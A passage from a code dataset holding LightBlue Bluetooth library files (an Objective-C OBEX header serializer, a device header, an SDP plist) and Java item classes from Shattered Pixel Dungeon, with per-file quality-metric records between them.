"qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 0, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/mac/LightAquaBlue/BBOBEXHeaderSet.m | /*
* Copyright (c) 2009 Bea Lam. All rights reserved.
*
* This file is part of LightBlue.
*
* LightBlue is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* LightBlue is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with LightBlue. If not, see <http://www.gnu.org/licenses/>.
*/
//
// BBOBEXHeaderSet.m
// LightAquaBlue
//
#import "BBOBEXHeaderSet.h"
enum kOBEXHeaderEncoding {
kHeaderEncodingMask = 0xc0,
kHeaderEncodingUnicode = 0x00,
kHeaderEncodingByteSequence = 0x40,
kHeaderEncoding1Byte = 0x80,
kHeaderEncoding4Byte = 0xc0
};
static NSString *DATE_FORMAT_STRING = @"%Y%m%dT%H%M%S"; // no 'Z' at end
static const uint8_t NULL_TERMINATORS[2] = { 0x00, 0x00 };
@implementation BBOBEXHeaderSet
+ (id)headerSet
{
return [[[BBOBEXHeaderSet alloc] init] autorelease];
}
- (id)init
{
self = [super init];
mDict = [[NSMutableDictionary alloc] initWithCapacity:0];
mKeys = [[NSMutableArray alloc] initWithCapacity:0];
return self;
}
- (BOOL)containsValueForHeader:(uint8_t)headerID
{
return ([mDict objectForKey:[NSNumber numberWithUnsignedChar:headerID]] != nil);
}
#pragma mark -
- (unsigned int)valueForCountHeader
{
return [self valueFor4ByteHeader:kOBEXHeaderIDCount];
}
- (NSString *)valueForNameHeader
{
return [self valueForUnicodeHeader:kOBEXHeaderIDName];
}
- (NSString *)valueForTypeHeader
{
NSData *data = [self valueForByteSequenceHeader:kOBEXHeaderIDType];
if (!data)
return nil;
if ([data length] == 0)
return [NSString string];
const char *s = (const char *)[data bytes];
if (s[[data length]-1] == '\0') {
return [NSString stringWithCString:(const char *)[data bytes]
encoding:NSASCIIStringEncoding];
}
return [[[NSString alloc] initWithBytes:[data bytes]
length:[data length]
encoding:NSASCIIStringEncoding] autorelease];
}
- (unsigned int)valueForLengthHeader
{
return [self valueFor4ByteHeader:kOBEXHeaderIDLength];
}
- (NSDate *)valueForTimeHeader
{
NSData *data = [self valueForByteSequenceHeader:kOBEXHeaderIDTimeISO];
if (data && [data length] > 0) {
NSString *s = [[[NSString alloc] initWithBytes:[data bytes]
length:[data length]
encoding:NSASCIIStringEncoding] autorelease];
NSCalendarDate *calendarDate = nil;
if ([s characterAtIndex:[s length]-1] == 'Z') {
calendarDate = [NSCalendarDate dateWithString:[s substringToIndex:[s length]-1]
calendarFormat:DATE_FORMAT_STRING];
[calendarDate setTimeZone:[NSTimeZone timeZoneWithName:@"UTC"]];
} else {
calendarDate = [NSCalendarDate dateWithString:s
calendarFormat:DATE_FORMAT_STRING];
[calendarDate setTimeZone:[NSTimeZone localTimeZone]];
}
return calendarDate;
} else {
uint32_t time = [self valueFor4ByteHeader:kOBEXHeaderIDTime4Byte];
return [NSDate dateWithTimeIntervalSince1970:time];
}
return nil;
}
- (NSString *)valueForDescriptionHeader
{
return [self valueForUnicodeHeader:kOBEXHeaderIDDescription];
}
- (NSData *)valueForTargetHeader
{
return [self valueForByteSequenceHeader:kOBEXHeaderIDTarget];
}
- (NSData *)valueForHTTPHeader
{
return [self valueForByteSequenceHeader:kOBEXHeaderIDHTTP];
}
- (NSData *)valueForWhoHeader
{
return [self valueForByteSequenceHeader:kOBEXHeaderIDWho];
}
- (uint32_t)valueForConnectionIDHeader
{
return [self valueFor4ByteHeader:kOBEXHeaderIDConnectionID];
}
- (NSData *)valueForApplicationParametersHeader
{
return [self valueForByteSequenceHeader:kOBEXHeaderIDAppParameters];
}
- (NSData *)valueForAuthorizationChallengeHeader
{
return [self valueForByteSequenceHeader:kOBEXHeaderIDAuthorizationChallenge];
}
- (NSData *)valueForAuthorizationResponseHeader
{
return [self valueForByteSequenceHeader:kOBEXHeaderIDAuthorizationResponse];
}
- (NSData *)valueForObjectClassHeader
{
return [self valueForByteSequenceHeader:0x51];
}
#pragma mark -
- (unsigned int)valueFor4ByteHeader:(uint8_t)headerID
{
NSNumber *number = [mDict objectForKey:[NSNumber numberWithUnsignedChar:headerID]];
if (number)
return [number unsignedIntValue];
return 0;
}
- (NSData *)valueForByteSequenceHeader:(uint8_t)headerID
{
return [mDict objectForKey:[NSNumber numberWithUnsignedChar:headerID]];
}
- (uint8_t)valueFor1ByteHeader:(uint8_t)headerID
{
NSNumber *number = [mDict objectForKey:[NSNumber numberWithUnsignedChar:headerID]];
if (number)
return [number unsignedCharValue];
return 0;
}
- (NSString *)valueForUnicodeHeader:(uint8_t)headerID
{
return [mDict objectForKey:[NSNumber numberWithUnsignedChar:headerID]];
}
- (NSArray *)allHeaders
{
return mKeys;
}
#pragma mark -
static void addUInt16Bytes(uint16_t value, NSMutableData *data)
{
uint16_t swapped = NSSwapHostShortToBig(value);
[data appendBytes:&swapped length:sizeof(swapped)];
}
static NSMutableData *stringHeaderBytes(uint8_t hid, NSString *s)
{
NSMutableData *bytes = [NSMutableData dataWithBytes:&hid length:1];
if ([s length] == 0) {
addUInt16Bytes(3, bytes); // empty string == header length of 3
return bytes;
}
CFStringEncoding encoding;
#if __BIG_ENDIAN__
encoding = kCFStringEncodingUnicode;
#elif __LITTLE_ENDIAN__
encoding = kCFStringEncodingUTF16BE; // not in 10.3
#endif
CFDataRef encodedString = CFStringCreateExternalRepresentation(NULL,
(CFStringRef)s, encoding, '?');
if (encodedString) {
// CFStringCreateExternalRepresentation() may insert 2-byte BOM
if (CFDataGetLength(encodedString) >= 2) {
const uint8_t *bytePtr = CFDataGetBytePtr(encodedString);
CFIndex length = CFDataGetLength(encodedString);
if ( (bytePtr[0] == 0xFE && bytePtr[1] == 0xFF) ||
(bytePtr[0] == 0xFF && bytePtr[1] == 0xFE) ) {
bytePtr = &CFDataGetBytePtr(encodedString)[2];
length -= 2;
}
addUInt16Bytes(length + 2 + 3, bytes);
[bytes appendBytes:bytePtr
length:length];
[bytes appendBytes:NULL_TERMINATORS length:2];
}
CFRelease(encodedString);
}
return bytes;
}
static NSData *byteSequenceHeaderBytes(uint8_t hid, NSData *data)
{
NSMutableData *headerBytes = [NSMutableData dataWithBytes:&hid length:1];
uint16_t headerLength = ([data length] + 3);
addUInt16Bytes(headerLength, headerBytes);
if ([data length] == 0)
return headerBytes;
[headerBytes appendData:data];
return headerBytes;
}
static NSData *fourByteHeaderBytes(uint8_t hid, uint32_t value)
{
NSMutableData *bytes = [NSMutableData dataWithBytes:&hid length:1];
uint32_t swapped = NSSwapHostIntToBig(value);
[bytes appendBytes:&swapped length:sizeof(swapped)];
return bytes;
}
static NSData *oneByteHeaderBytes(uint8_t hid, uint8_t value)
{
NSMutableData *bytes = [NSMutableData dataWithBytes:&hid length:1];
[bytes appendBytes:&value length:1];
return bytes;
}
- (NSMutableData *)toBytes
{
if ([mDict count] == 0)
return NULL;
NSMutableData *headerBytes = [[NSMutableData alloc] initWithLength:0];
if ([self containsValueForHeader:kOBEXHeaderIDTarget]) {
NSData *bytes;
NSData *target = [self valueForTargetHeader];
if (target)
bytes = byteSequenceHeaderBytes(kOBEXHeaderIDTarget, target);
if (!bytes)
return NULL;
[headerBytes appendData:bytes];
}
if ([self containsValueForHeader:kOBEXHeaderIDConnectionID]) {
NSData *bytes = fourByteHeaderBytes(kOBEXHeaderIDConnectionID,
[self valueForConnectionIDHeader]);
if (!bytes)
return NULL;
[headerBytes appendData:bytes];
}
NSArray *headers = [self allHeaders];
uint8_t rawHeaderID;
int i;
for (i=0; i<[headers count]; i++) {
rawHeaderID = [(NSNumber *)[headers objectAtIndex:i] unsignedCharValue];
//NSLog(@"--- toBytes() writing header 0x%02x", rawHeaderID);
if (rawHeaderID == kOBEXHeaderIDTarget || rawHeaderID == kOBEXHeaderIDConnectionID)
continue; // already handled these
NSData *bytes = nil;
switch (rawHeaderID & kHeaderEncodingMask) {
case kHeaderEncodingUnicode:
{
NSString *s = [self valueForUnicodeHeader:rawHeaderID];
if (!s)
return NULL;
bytes = stringHeaderBytes(rawHeaderID, s);
break;
}
case kHeaderEncodingByteSequence:
{
NSData *data = [self valueForByteSequenceHeader:rawHeaderID];
if (!data)
return NULL;
bytes = byteSequenceHeaderBytes(rawHeaderID, data);
break;
}
case kHeaderEncoding1Byte:
{
bytes = oneByteHeaderBytes(rawHeaderID, [self valueFor1ByteHeader:rawHeaderID]);
break;
}
case kHeaderEncoding4Byte:
{
bytes = fourByteHeaderBytes(rawHeaderID, [self valueFor4ByteHeader:rawHeaderID]);
break;
}
default:
return NULL;
}
if (bytes == nil)
return NULL;
[headerBytes appendData:bytes];
}
return headerBytes;
}
- (unsigned)count
{
return [mDict count];
}
#pragma mark -
static NSString *getHeaderDescription(uint8_t headerID)
{
switch (headerID) {
case kOBEXHeaderIDCount:
return @"Count";
case kOBEXHeaderIDName:
return @"Name";
case kOBEXHeaderIDDescription:
return @"Description";
case kOBEXHeaderIDType:
return @"Type";
case kOBEXHeaderIDLength:
return @"Length";
case kOBEXHeaderIDTimeISO:
case kOBEXHeaderIDTime4Byte:
return @"Time";
case kOBEXHeaderIDTarget:
return @"Target";
case kOBEXHeaderIDHTTP:
return @"HTTP";
case kOBEXHeaderIDBody:
return @"Body";
case kOBEXHeaderIDEndOfBody:
return @"End of Body";
case kOBEXHeaderIDWho:
return @"Who";
case kOBEXHeaderIDConnectionID:
return @"Connection ID";
case kOBEXHeaderIDAppParameters:
return @"Application Parameters";
case kOBEXHeaderIDAuthorizationChallenge:
return @"Authorization Challenge";
case kOBEXHeaderIDAuthorizationResponse:
return @"Authorization Response";
case 0x51:
return @"Object Class";
case 0x52:
return @"Session-Parameters";
case 0x93:
return @"Session-Sequence-Number";
default:
return [NSString stringWithFormat:@"0x%02x", headerID];
}
}
- (NSString *)description
{
NSMutableString *string = [NSMutableString stringWithCapacity:0];
[string appendString:@"{"];
NSNumber *n;
int i;
for (i=0; i<[mKeys count]; i++) {
n = [mKeys objectAtIndex:i];
[string appendFormat:@"%@: %@%@",
getHeaderDescription([n unsignedCharValue]),
[mDict objectForKey:n],
(i == [mKeys count]-1 ? @"" : @", ")];
}
[string appendString:@"}"];
return string;
}
- (void)dealloc
{
[mDict release];
[mKeys release];
[super dealloc];
}
@end
| 12,373 | BBOBEXHeaderSet | m | en | limbo | code | {"qsc_code_num_words": 1011, "qsc_code_num_chars": 12373.0, "qsc_code_mean_word_length": 7.71216617, "qsc_code_frac_words_unique": 0.28783383, "qsc_code_frac_chars_top_2grams": 0.0115429, "qsc_code_frac_chars_top_3grams": 0.03232012, "qsc_code_frac_chars_top_4grams": 0.0301398, "qsc_code_frac_chars_dupe_5grams": 0.16480698, "qsc_code_frac_chars_dupe_6grams": 0.13787354, "qsc_code_frac_chars_dupe_7grams": 0.1281262, "qsc_code_frac_chars_dupe_8grams": 0.09401052, "qsc_code_frac_chars_dupe_9grams": 0.09401052, "qsc_code_frac_chars_dupe_10grams": 0.04976273, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01590633, "qsc_code_frac_chars_whitespace": 0.26832619, "qsc_code_size_file_byte": 12373.0, "qsc_code_num_lines": 426.0, "qsc_code_num_chars_line_max": 98.0, "qsc_code_num_chars_line_mean": 29.04460094, "qsc_code_frac_chars_alphabet": 0.84535513, "qsc_code_frac_chars_comments": 0.01115332, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.1512605, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.02198611, "qsc_code_frac_chars_long_word_length": 0.00187985, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00490396, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
0-1-0/lightblue-0.4 | src/mac/LightAquaBlue/BBLocalDevice.h | /*
* Copyright (c) 2009 Bea Lam. All rights reserved.
*
* This file is part of LightBlue.
*
* LightBlue is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* LightBlue is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with LightBlue. If not, see <http://www.gnu.org/licenses/>.
*/
//
// BBLocalDevice.h
// LightAquaBlue
//
// Provides information about the local Bluetooth device.
//
#import <Cocoa/Cocoa.h>
#import <IOBluetooth/Bluetooth.h>
@interface BBLocalDevice : NSObject {
//
}
/*
* Returns the local device name, or nil if it can't be read.
*/
+ (NSString *)getName;
/*
* Returns the local device address as a string, or nil if it can't be read.
* The address is separated by hyphens, e.g. "00-11-22-33-44-55".
*/
+ (NSString *)getAddressString;
/*
* Returns the local device's class of device, or -1 if it can't be read.
*/
+ (BluetoothClassOfDevice)getClassOfDevice;
/*
* Returns YES if the local device is available and switched on.
*/
+ (BOOL)isPoweredOn;
@end
| 1,448 | BBLocalDevice | h | en | c | code | {"qsc_code_num_words": 215, "qsc_code_num_chars": 1448.0, "qsc_code_mean_word_length": 4.79534884, "qsc_code_frac_words_unique": 0.5627907, "qsc_code_frac_chars_top_2grams": 0.03879728, "qsc_code_frac_chars_top_3grams": 0.0543162, "qsc_code_frac_chars_top_4grams": 0.05528613, "qsc_code_frac_chars_dupe_5grams": 0.1299709, "qsc_code_frac_chars_dupe_6grams": 0.10475267, "qsc_code_frac_chars_dupe_7grams": 0.03685742, "qsc_code_frac_chars_dupe_8grams": 0.03685742, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01535836, "qsc_code_frac_chars_whitespace": 0.19060773, "qsc_code_size_file_byte": 1448.0, "qsc_code_num_lines": 55.0, "qsc_code_num_chars_line_max": 77.0, "qsc_code_num_chars_line_mean": 26.32727273, "qsc_code_frac_chars_alphabet": 0.86433447, "qsc_code_frac_chars_comments": 0.83632597, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.0, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 1.0, "qsc_codec_score_lines_no_logic": 0.0, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": null} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 1, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 0, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/mac/LightAquaBlue/SerialPortDictionary.plist | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>0001 - ServiceClassIDList</key>
<array>
<data>
EQE=
</data>
</array>
<key>0004 - ProtocolDescriptorList</key>
<array>
<array>
<data>
AQA=
</data>
</array>
<array>
<data>
AAM=
</data>
<dict>
<key>DataElementSize</key>
<integer>1</integer>
<key>DataElementType</key>
<integer>1</integer>
<key>DataElementValue</key>
<integer>3</integer>
</dict>
</array>
</array>
<key>0005 - BrowseGroupList*</key>
<array>
<data>
EAI=
</data>
</array>
<key>0006 - LanguageBaseAttributeIDList*</key>
<array>
<dict>
<key>DataElementSize</key>
<integer>2</integer>
<key>DataElementType</key>
<integer>1</integer>
<key>DataElementValue</key>
<integer>25966</integer>
</dict>
<dict>
<key>DataElementSize</key>
<integer>2</integer>
<key>DataElementType</key>
<integer>1</integer>
<key>DataElementValue</key>
<integer>106</integer>
</dict>
<dict>
<key>DataElementSize</key>
<integer>2</integer>
<key>DataElementType</key>
<integer>1</integer>
<key>DataElementValue</key>
<integer>256</integer>
</dict>
</array>
<key>0009 - BluetoothProfileDescriptorList</key>
<array>
<array>
<data>
EQE=
</data>
<dict>
<key>DataElementSize</key>
<integer>2</integer>
<key>DataElementType</key>
<integer>1</integer>
<key>DataElementValue</key>
<integer>256</integer>
</dict>
</array>
</array>
<key>0303 - Supported Formats List</key>
<array>
<dict>
<key>DataElementType</key>
<integer>1</integer>
<key>DataElementValue</key>
<data>
/w==
</data>
</dict>
</array>
</dict>
</plist>
| 1,838 | SerialPortDictionary | plist | en | openstep property list | data | {"qsc_code_num_words": 206, "qsc_code_num_chars": 1838.0, "qsc_code_mean_word_length": 5.51941748, "qsc_code_frac_words_unique": 0.24757282, "qsc_code_frac_chars_top_2grams": 0.1407212, "qsc_code_frac_chars_top_3grams": 0.06772208, "qsc_code_frac_chars_top_4grams": 0.11081794, "qsc_code_frac_chars_dupe_5grams": 0.60070361, "qsc_code_frac_chars_dupe_6grams": 0.57167986, "qsc_code_frac_chars_dupe_7grams": 0.53649956, "qsc_code_frac_chars_dupe_8grams": 0.53649956, "qsc_code_frac_chars_dupe_9grams": 0.53649956, "qsc_code_frac_chars_dupe_10grams": 0.48548813, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03922872, "qsc_code_frac_chars_whitespace": 0.18171926, "qsc_code_size_file_byte": 1838.0, "qsc_code_num_lines": 93.0, "qsc_code_num_chars_line_max": 112.0, "qsc_code_num_chars_line_mean": 19.76344086, "qsc_code_frac_chars_alphabet": 0.71675532, "qsc_code_frac_chars_comments": 0.0, "qsc_code_cate_xml_start": 1.0, "qsc_code_frac_lines_dupe_lines": 0.8172043, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.05059848, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_words_unique": 1, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 1, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 1, "qsc_code_cate_autogen": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/elixirs/Elixir.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.elixirs;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.Potion;
public abstract class Elixir extends Potion {
public abstract void apply( Hero hero );
@Override
public boolean isKnown() {
return true;
}
}
| 1,143 | Elixir | java | en | java | code | {"qsc_code_num_words": 160, "qsc_code_num_chars": 1143.0, "qsc_code_mean_word_length": 5.41875, "qsc_code_frac_words_unique": 0.625, "qsc_code_frac_chars_top_2grams": 0.03806228, "qsc_code_frac_chars_top_3grams": 0.0449827, "qsc_code_frac_chars_top_4grams": 0.06574394, "qsc_code_frac_chars_dupe_5grams": 0.20991926, "qsc_code_frac_chars_dupe_6grams": 0.06459054, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0179704, "qsc_code_frac_chars_whitespace": 0.17235346, "qsc_code_size_file_byte": 1143.0, "qsc_code_num_lines": 35.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 32.65714286, "qsc_code_frac_chars_alphabet": 0.89852008, "qsc_code_frac_chars_comments": 0.6824147, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.1, "qsc_codejava_score_lines_no_logic": 0.5, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/elixirs/ElixirOfIcyTouch.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.elixirs;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.FrostImbue;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.effects.particles.SnowParticle;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.AlchemicalCatalyst;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.exotic.PotionOfSnapFreeze;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class ElixirOfIcyTouch extends Elixir {
{
//TODO finish visuals
image = ItemSpriteSheet.ELIXIR_ICY;
}
@Override
public void apply(Hero hero) {
Buff.affect(hero, FrostImbue.class, FrostImbue.DURATION);
hero.sprite.emitter().burst(SnowParticle.FACTORY, 5);
}
@Override
protected int splashColor() {
return 0xFF18C3E6;
}
